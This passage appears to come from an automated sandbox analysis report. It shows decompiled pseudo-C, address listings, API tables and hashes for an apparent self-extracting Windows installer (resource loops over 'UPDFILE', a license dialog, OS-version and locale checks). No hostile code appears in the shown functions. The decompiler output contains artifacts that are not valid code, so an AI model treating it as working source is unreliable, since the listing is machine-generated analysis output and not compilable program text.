                              				struct HWND__* _t67;
                              				struct HWND__* _t68;
                              				struct HDC__* _t69;
                              				int _t72;
                              				signed int _t74;
                              
                              				_t63 = __edx;
                              				_t29 =  *0xa78004; // 0x74742267
                              				_v8 = _t29 ^ _t74;
                              				_t68 = __edx;
                              				_v44 = __ecx;
                              				GetWindowRect(__ecx,  &_v40);
                              				_t53 = _v40.bottom - _v40.top;
                              				_v48 = _v40.right - _v40.left;
                              				GetWindowRect(_t68,  &_v24);
                              				_v56 = _v24.bottom - _v24.top;
                              				_t69 = GetDC(_v44);
                              				_v52 = GetDeviceCaps(_t69, 8);
                              				_v60 = GetDeviceCaps(_t69, 0xa);
                              				ReleaseDC(_v44, _t69);
                              				_t56 = _v48;
                              				asm("cdq");
                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                              				_t67 = 0;
                              				if(_t72 >= 0) {
                              					_t63 = _v52;
                              					if(_t72 + _t56 > _t63) {
                              						_t72 = _t63 - _t56;
                              					}
                              				} else {
                              					_t72 = _t67;
                              				}
                              				asm("cdq");
                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                              				if(_t59 >= 0) {
                              					_t63 = _v60;
                              					if(_t59 + _t53 > _t63) {
                              						_t59 = _t63 - _t53;
                              					}
                              				} else {
                              					_t59 = _t67;
                              				}
                              				return E00A76CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                              			}
























                              0x00a743d0
                              0x00a743d8
                              0x00a743df
                              0x00a743e6
                              0x00a743ec
                              0x00a743f1
                              0x00a74400
                              0x00a74403
                              0x00a7440b
                              0x00a74420
                              0x00a74429
                              0x00a74437
                              0x00a74444
                              0x00a74447
                              0x00a7444d
                              0x00a74454
                              0x00a7445b
                              0x00a74460
                              0x00a74461
                              0x00a74467
                              0x00a7446f
                              0x00a74473
                              0x00a74473
                              0x00a74463
                              0x00a74463
                              0x00a74463
                              0x00a7447a
                              0x00a74481
                              0x00a74484
                              0x00a7448a
                              0x00a74492
                              0x00a74496
                              0x00a74496
                              0x00a74486
                              0x00a74486
                              0x00a74486
                              0x00a744b8

                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00A743F1
                              • GetWindowRect.USER32(00000000,?), ref: 00A7440B
                              • GetDC.USER32(?), ref: 00A74423
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A7442E
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A7443A
                              • ReleaseDC.USER32(?,00000000), ref: 00A74447
                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A744A2
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceRect$Release
                              • String ID:
                              • API String ID: 2212493051-0
                              • Opcode ID: 43184ea3db8d29c4263131e39b9f0a60c52f883feb8b27b9cdc70140604e5554
                              • Instruction ID: ef3c8423c99aaac0a73db749d7b0bda914af3b299068fe62144dd6d9aad8a398
                              • Opcode Fuzzy Hash: 43184ea3db8d29c4263131e39b9f0a60c52f883feb8b27b9cdc70140604e5554
                              • Instruction Fuzzy Hash: CD312F72E00119AFDB14CFF8DD499EEBBB5EB89311F558269F809B3250DA306D468B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E00A76298(intOrPtr __ecx, intOrPtr* __edx) {
                              				signed int _v8;
                              				char _v28;
                              				intOrPtr _v32;
                              				struct HINSTANCE__* _v36;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				struct HRSRC__* _t21;
                              				intOrPtr _t26;
                              				void* _t30;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr* _t40;
                              				void* _t41;
                              				intOrPtr* _t44;
                              				intOrPtr* _t45;
                              				void* _t47;
                              				signed int _t50;
                              				struct HINSTANCE__* _t51;
                              
                              				_t44 = __edx;
                              				_t16 =  *0xa78004; // 0x74742267
                              				_v8 = _t16 ^ _t50;
                              				_t46 = 0;
                              				_v32 = __ecx;
                              				_v36 = 0;
                              				_t36 = 1;
                              				E00A7171E( &_v28, 0x14, "UPDFILE%lu", 0);
                              				while(1) {
                              					_t51 = _t51 + 0x10;
                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                              					if(_t21 == 0) {
                              						break;
                              					}
                              					_t45 = LockResource(LoadResource(_t46, _t21));
                              					if(_t45 == 0) {
                              						 *0xa79124 = 0x80070714;
                              						_t36 = _t46;
                              					} else {
                              						_t5 = _t45 + 8; // 0x8
                              						_t44 = _t5;
                              						_t40 = _t44;
                              						_t6 = _t40 + 1; // 0x9
                              						_t47 = _t6;
                              						do {
                              							_t26 =  *_t40;
                              							_t40 = _t40 + 1;
                              						} while (_t26 != 0);
                              						_t41 = _t40 - _t47;
                              						_t46 = _t51;
                              						_t7 = _t41 + 1; // 0xa
                              						 *0xa7a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                              						_t30 = _v32();
                              						if(_t51 != _t51) {
                              							asm("int 0x29");
                              						}
                              						_push(_t45);
                              						if(_t30 == 0) {
                              							_t36 = 0;
                              							FreeResource(??);
                              						} else {
                              							FreeResource();
                              							_v36 = _v36 + 1;
                              							E00A7171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                              							_t46 = 0;
                              							continue;
                              						}
                              					}
                              					L12:
                              					return E00A76CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                              				}
                              				goto L12;
                              			}






















                              0x00a76298
                              0x00a762a0
                              0x00a762a7
                              0x00a762ad
                              0x00a762af
                              0x00a762bb
                              0x00a762c3
                              0x00a762c4
                              0x00a7633b
                              0x00a7633b
                              0x00a76345
                              0x00a7634d
                              0x00000000
                              0x00000000
                              0x00a762da
                              0x00a762de
                              0x00a7635f
                              0x00a76369
                              0x00a762e0
                              0x00a762e0
                              0x00a762e0
                              0x00a762e3
                              0x00a762e5
                              0x00a762e5
                              0x00a762e8
                              0x00a762e8
                              0x00a762ea
                              0x00a762eb
                              0x00a762ef
                              0x00a762f1
                              0x00a762f3
                              0x00a76302
                              0x00a76308
                              0x00a7630d
                              0x00a76314
                              0x00a76314
                              0x00a76316
                              0x00a76319
                              0x00a76355
                              0x00a76357
                              0x00a7631b
                              0x00a7631b
                              0x00a76331
                              0x00a76334
                              0x00a76339
                              0x00000000
                              0x00a76339
                              0x00a76319
                              0x00a7636b
                              0x00a7637d
                              0x00a7637d
                              0x00000000

                              APIs
                                • Part of subcall function 00A7171E: _vsnprintf.MSVCRT ref: 00A71750
                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A762CD
                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A762D4
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A7631B
                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A76345
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A76357
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                              • String ID: UPDFILE%lu
                              • API String ID: 2922116661-2329316264
                              • Opcode ID: c3df47f0bbe8585ae3e64cc35521c562745db6d00ddae189260c85af513ca490
                              • Instruction ID: d7da4928d12a9fec4ea62991474e2dbe7b45cf7fe92f4d931f30a56dafeba5c0
                              • Opcode Fuzzy Hash: c3df47f0bbe8585ae3e64cc35521c562745db6d00ddae189260c85af513ca490
                              • Instruction Fuzzy Hash: 2021E471A00619ABDB14DFA49C49AFE7B78FB84710B00C229F90AA7241DB359D42CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A7681F(void* __ebx) {
                              				signed int _v8;
                              				char _v20;
                              				struct _OSVERSIONINFOA _v168;
                              				void* _v172;
                              				int* _v176;
                              				int _v180;
                              				int _v184;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				long _t31;
                              				signed int _t35;
                              				void* _t36;
                              				intOrPtr _t41;
                              				signed int _t44;
                              
                              				_t36 = __ebx;
                              				_t19 =  *0xa78004; // 0x74742267
                              				_v8 = _t19 ^ _t44;
                              				_t41 =  *0xa781d8; // 0xfffffffe
                              				_t43 = 0;
                              				_v180 = 0xc;
                              				_v176 = 0;
                              				if(_t41 == 0xfffffffe) {
                              					 *0xa781d8 = 0;
                              					_v168.dwOSVersionInfoSize = 0x94;
                              					if(GetVersionExA( &_v168) == 0) {
                              						L12:
                              						_t41 =  *0xa781d8; // 0xfffffffe
                              					} else {
                              						_t41 = 1;
                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                              							goto L12;
                              						} else {
                              							_t31 = RegQueryValueExA(_v172, 0xa71140, 0,  &_v184,  &_v20,  &_v180);
                              							_t43 = _t31;
                              							RegCloseKey(_v172);
                              							if(_t31 != 0) {
                              								goto L12;
                              							} else {
                              								_t40 =  &_v176;
                              								if(E00A766F9( &_v20,  &_v176) == 0) {
                              									goto L12;
                              								} else {
                              									_t35 = _v176 & 0x000003ff;
                              									if(_t35 == 1 || _t35 == 0xd) {
                              										 *0xa781d8 = _t41;
                              									} else {
                              										goto L12;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E00A76CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                              			}


















                              0x00a7681f
                              0x00a7682a
                              0x00a76831
                              0x00a76836
                              0x00a7683c
                              0x00a7683e
                              0x00a76848
                              0x00a76851
                              0x00a7685d
                              0x00a76864
                              0x00a76876
                              0x00a7693a
                              0x00a7693a
                              0x00a7687c
                              0x00a7687e
                              0x00a76885
                              0x00000000
                              0x00a768d6
                              0x00a768f4
                              0x00a76900
                              0x00a76902
                              0x00a7690a
                              0x00000000
                              0x00a7690c
                              0x00a7690c
                              0x00a7691c
                              0x00000000
                              0x00a7691e
                              0x00a76924
                              0x00a7692b
                              0x00a76932
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7692b
                              0x00a7691c
                              0x00a7690a
                              0x00a76885
                              0x00a76876
                              0x00a76951

                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A7686E
                              • GetSystemMetrics.USER32(0000004A), ref: 00A768A7
                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A768CC
                              • RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,?,0000000C), ref: 00A768F4
                              • RegCloseKey.ADVAPI32(?), ref: 00A76902
                                • Part of subcall function 00A766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A7691A), ref: 00A76741
                              Strings
                              • Control Panel\Desktop\ResourceLocale, xrefs: 00A768C2
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                              • String ID: Control Panel\Desktop\ResourceLocale
                              • API String ID: 3346862599-1109908249
                              • Opcode ID: ed5ff77cf9796135cfa8ec9885f33ad22292ee66dc6c2e5b35352d43584e3c1b
                              • Instruction ID: 697920ad60252897c7986db9bc0dc10d7b99df48695d388805e2a0ffa322174e
                              • Opcode Fuzzy Hash: ed5ff77cf9796135cfa8ec9885f33ad22292ee66dc6c2e5b35352d43584e3c1b
                              • Instruction Fuzzy Hash: EE319531A00618EFDB31CB52CC04BAA77BCFB45714F00C5A5EA4DA6240DB309D86CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A73A3F(void* __eflags) {
                              				void* _t3;
                              				void* _t9;
                              				CHAR* _t16;
                              
                              				_t16 = "LICENSE";
                              				_t1 = E00A7468F(_t16, 0, 0) + 1; // 0x1
                              				_t3 = LocalAlloc(0x40, _t1);
                              				 *0xa78d4c = _t3;
                              				if(_t3 != 0) {
                              					_t19 = _t16;
                              					if(E00A7468F(_t16, _t3, _t28) != 0) {
                              						if(lstrcmpA( *0xa78d4c, "<None>") == 0) {
                              							LocalFree( *0xa78d4c);
                              							L9:
                              							 *0xa79124 = 0;
                              							return 1;
                              						}
                              						_t9 = E00A76517(_t19, 0x7d1, 0, E00A73100, 0, 0);
                              						LocalFree( *0xa78d4c);
                              						if(_t9 != 0) {
                              							goto L9;
                              						}
                              						 *0xa79124 = 0x800704c7;
                              						L2:
                              						return 0;
                              					}
                              					E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree( *0xa78d4c);
                              					 *0xa79124 = 0x80070714;
                              					goto L2;
                              				}
                              				E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0xa79124 = E00A76285();
                              				goto L2;
                              			}






                              0x00a73a46
                              0x00a73a57
                              0x00a73a5d
                              0x00a73a63
                              0x00a73a6a
                              0x00a73a91
                              0x00a73a9a
                              0x00a73ad8
                              0x00a73b13
                              0x00a73b19
                              0x00a73b1b
                              0x00000000
                              0x00a73b21
                              0x00a73ae7
                              0x00a73af4
                              0x00a73afc
                              0x00000000
                              0x00000000
                              0x00a73afe
                              0x00a73a87
                              0x00000000
                              0x00a73a87
                              0x00a73aa8
                              0x00a73ab3
                              0x00a73ab9
                              0x00000000
                              0x00a73ab9
                              0x00a73a78
                              0x00a73a82
                              0x00000000

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A72F64,?,00000002,00000000), ref: 00A73A5D
                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A73AB3
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A73AD0
                              • LocalFree.KERNEL32 ref: 00A73B13
                                • Part of subcall function 00A76517: FindResourceA.KERNEL32(00A70000,000007D6,00000005), ref: 00A7652A
                                • Part of subcall function 00A76517: LoadResource.KERNEL32(00A70000,00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A76538
                                • Part of subcall function 00A76517: DialogBoxIndirectParamA.USER32(00A70000,00000000,00000547,00A719E0,00000000), ref: 00A76557
                                • Part of subcall function 00A76517: FreeResource.KERNEL32(00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A76560
                              • LocalFree.KERNEL32(00000000,00A73100,00000000,00000000), ref: 00A73AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                              • String ID: <None>$LICENSE
                              • API String ID: 2414642746-383193767
                              • Opcode ID: 9a0f31d0403695e388444e87019b30afbab03badd3c8842a507b2481f1bb66c6
                              • Instruction ID: 6447b4d2833547752c0735035b144aa02dd31fb67bc2ddacb43508360bc0029e
                              • Opcode Fuzzy Hash: 9a0f31d0403695e388444e87019b30afbab03badd3c8842a507b2481f1bb66c6
                              • Instruction Fuzzy Hash: 0B11DA323402017BDB20DFB29D09E1B3AB9DBD9B50B11C53EB94DD51A1DB7D88429664
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A724E0(void* __ebx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t7;
                              				void* _t20;
                              				long _t26;
                              				signed int _t27;
                              
                              				_t20 = __ebx;
                              				_t7 =  *0xa78004; // 0x74742267
                              				_v8 = _t7 ^ _t27;
                              				_t25 = 0x104;
                              				_t26 = 0;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					E00A7658A( &_v268, 0x104, "wininit.ini");
                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                              					_t25 = _lopen( &_v268, 0x40);
                              					if(_t25 != 0xffffffff) {
                              						_t26 = _llseek(_t25, 0, 2);
                              						_lclose(_t25);
                              					}
                              				}
                              				return E00A76CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                              			}











                              0x00a724e0
                              0x00a724eb
                              0x00a724f2
                              0x00a724f7
                              0x00a72504
                              0x00a7250e
                              0x00a7251d
                              0x00a7252c
                              0x00a72541
                              0x00a72546
                              0x00a72553
                              0x00a72555
                              0x00a72555
                              0x00a72546
                              0x00a7256c

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A72506
                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A7252C
                              • _lopen.KERNEL32 ref: 00A7253B
                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A7254C
                              • _lclose.KERNEL32(00000000), ref: 00A72555
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                              • String ID: wininit.ini
                              • API String ID: 3273605193-4206010578
                              • Opcode ID: acae0b6c8ba944dab5e73cc8e4e01c37fa7b6efebf8dd7a3a1001a7df5265521
                              • Instruction ID: b44bcd4994cb1ff5262b0a62b5d7853ef75e883a7641909bb66b73d57a4b02ac
                              • Opcode Fuzzy Hash: acae0b6c8ba944dab5e73cc8e4e01c37fa7b6efebf8dd7a3a1001a7df5265521
                              • Instruction Fuzzy Hash: 2D019E326001187BC720DBA99C0CEDFBBBDEB95760F008565FA4DD3190DA748E878AA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00A736EE(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v268;
                              				struct _OSVERSIONINFOA _v416;
                              				signed int _v420;
                              				signed int _v424;
                              				CHAR* _v428;
                              				CHAR* _v432;
                              				signed int _v436;
                              				CHAR* _v440;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t72;
                              				CHAR* _t77;
                              				CHAR* _t91;
                              				CHAR* _t94;
                              				int _t97;
                              				CHAR* _t98;
                              				signed char _t99;
                              				CHAR* _t104;
                              				signed short _t107;
                              				signed int _t109;
                              				short _t113;
                              				void* _t114;
                              				signed char _t115;
                              				short _t119;
                              				CHAR* _t123;
                              				CHAR* _t124;
                              				CHAR* _t129;
                              				signed int _t131;
                              				signed int _t132;
                              				CHAR* _t135;
                              				CHAR* _t138;
                              				signed int _t139;
                              
                              				_t72 =  *0xa78004; // 0x74742267
                              				_v8 = _t72 ^ _t139;
                              				_v416.dwOSVersionInfoSize = 0x94;
                              				_t115 = __ecx;
                              				_t135 = 0;
                              				_v432 = __ecx;
                              				_t138 = 0;
                              				if(GetVersionExA( &_v416) != 0) {
                              					_t133 = _v416.dwMajorVersion;
                              					_t119 = 2;
                              					_t77 = _v416.dwPlatformId - 1;
                              					__eflags = _t77;
                              					if(_t77 == 0) {
                              						_t119 = 0;
                              						__eflags = 1;
                              						 *0xa78184 = 1;
                              						 *0xa78180 = 1;
                              						L13:
                              						 *0xa79a40 = _t119;
                              						L14:
                              						__eflags =  *0xa78a34 - _t138; // 0x0
                              						if(__eflags != 0) {
                              							goto L66;
                              						}
                              						__eflags = _t115;
                              						if(_t115 == 0) {
                              							goto L66;
                              						}
                              						_v428 = _t135;
                              						__eflags = _t119;
                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                              						_t11 =  &_v420;
                              						 *_t11 = _v420 & _t138;
                              						__eflags =  *_t11;
                              						_v440 = _t115;
                              						do {
                              							_v424 = _t135 * 0x18;
                              							_v436 = E00A72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                              							_t91 = E00A72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                              							_t123 = _v436;
                              							_t133 = 0x54d;
                              							__eflags = _t123;
                              							if(_t123 < 0) {
                              								L32:
                              								__eflags = _v420 - 1;
                              								if(_v420 == 1) {
                              									_t138 = 0x54c;
                              									L36:
                              									__eflags = _t138;
                              									if(_t138 != 0) {
                              										L40:
                              										__eflags = _t138 - _t133;
                              										if(_t138 == _t133) {
                              											L30:
                              											_v420 = _v420 & 0x00000000;
                              											_t115 = 0;
                              											_v436 = _v436 & 0x00000000;
                              											__eflags = _t138 - _t133;
                              											_t133 = _v432;
                              											if(__eflags != 0) {
                              												_t124 = _v440;
                              											} else {
                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                              												_v420 =  &_v268;
                              											}
                              											__eflags = _t124;
                              											if(_t124 == 0) {
                              												_t135 = _v436;
                              											} else {
                              												_t99 = _t124[0x30];
                              												_t135 = _t124[0x34] + 0x84 + _t133;
                              												__eflags = _t99 & 0x00000001;
                              												if((_t99 & 0x00000001) == 0) {
                              													asm("sbb ebx, ebx");
                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                              												} else {
                              													_t115 = 0x104;
                              												}
                              											}
                              											__eflags =  *0xa78a38 & 0x00000001;
                              											if(( *0xa78a38 & 0x00000001) != 0) {
                              												L64:
                              												_push(0);
                              												_push(0x30);
                              												_push(_v420);
                              												_push("lenta");
                              												goto L65;
                              											} else {
                              												__eflags = _t135;
                              												if(_t135 == 0) {
                              													goto L64;
                              												}
                              												__eflags =  *_t135;
                              												if( *_t135 == 0) {
                              													goto L64;
                              												}
                              												MessageBeep(0);
                              												_t94 = E00A7681F(_t115);
                              												__eflags = _t94;
                              												if(_t94 == 0) {
                              													L57:
                              													0x180030 = 0x30;
                              													L58:
                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                              													__eflags = _t115 & 0x00000004;
                              													if((_t115 & 0x00000004) == 0) {
                              														__eflags = _t115 & 0x00000001;
                              														if((_t115 & 0x00000001) == 0) {
                              															goto L66;
                              														}
                              														__eflags = _t97 - 1;
                              														L62:
                              														if(__eflags == 0) {
                              															_t138 = 0;
                              														}
                              														goto L66;
                              													}
                              													__eflags = _t97 - 6;
                              													goto L62;
                              												}
                              												_t98 = E00A767C9(_t124, _t124);
                              												__eflags = _t98;
                              												if(_t98 == 0) {
                              													goto L57;
                              												}
                              												goto L58;
                              											}
                              										}
                              										__eflags = _t138 - 0x54c;
                              										if(_t138 == 0x54c) {
                              											goto L30;
                              										}
                              										__eflags = _t138;
                              										if(_t138 == 0) {
                              											goto L66;
                              										}
                              										_t135 = 0;
                              										__eflags = 0;
                              										goto L44;
                              									}
                              									L37:
                              									_t129 = _v432;
                              									__eflags = _t129[0x7c];
                              									if(_t129[0x7c] == 0) {
                              										goto L66;
                              									}
                              									_t133 =  &_v268;
                              									_t104 = E00A728E8(_t129,  &_v268, _t129,  &_v428);
                              									__eflags = _t104;
                              									if(_t104 != 0) {
                              										goto L66;
                              									}
                              									_t135 = _v428;
                              									_t133 = 0x54d;
                              									_t138 = 0x54d;
                              									goto L40;
                              								}
                              								goto L33;
                              							}
                              							__eflags = _t91;
                              							if(_t91 > 0) {
                              								goto L32;
                              							}
                              							__eflags = _t123;
                              							if(_t123 != 0) {
                              								__eflags = _t91;
                              								if(_t91 != 0) {
                              									goto L37;
                              								}
                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                              								L27:
                              								if(__eflags <= 0) {
                              									goto L37;
                              								}
                              								L28:
                              								__eflags = _t135;
                              								if(_t135 == 0) {
                              									goto L33;
                              								}
                              								_t138 = 0x54c;
                              								goto L30;
                              							}
                              							__eflags = _t91;
                              							_t107 = _v416.dwBuildNumber;
                              							if(_t91 != 0) {
                              								_t131 = _v424;
                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                              									goto L37;
                              								}
                              								goto L28;
                              							}
                              							_t132 = _t107 & 0x0000ffff;
                              							_t109 = _v424;
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                              								goto L28;
                              							}
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                              							goto L27;
                              							L33:
                              							_t135 =  &(_t135[1]);
                              							_v428 = _t135;
                              							_v420 = _t135;
                              							__eflags = _t135 - 2;
                              						} while (_t135 < 2);
                              						goto L36;
                              					}
                              					__eflags = _t77 == 1;
                              					if(_t77 == 1) {
                              						 *0xa79a40 = _t119;
                              						 *0xa78184 = 1;
                              						 *0xa78180 = 1;
                              						__eflags = _t133 - 3;
                              						if(_t133 > 3) {
                              							__eflags = _t133 - 5;
                              							if(_t133 < 5) {
                              								goto L14;
                              							}
                              							_t113 = 3;
                              							_t119 = _t113;
                              							goto L13;
                              						}
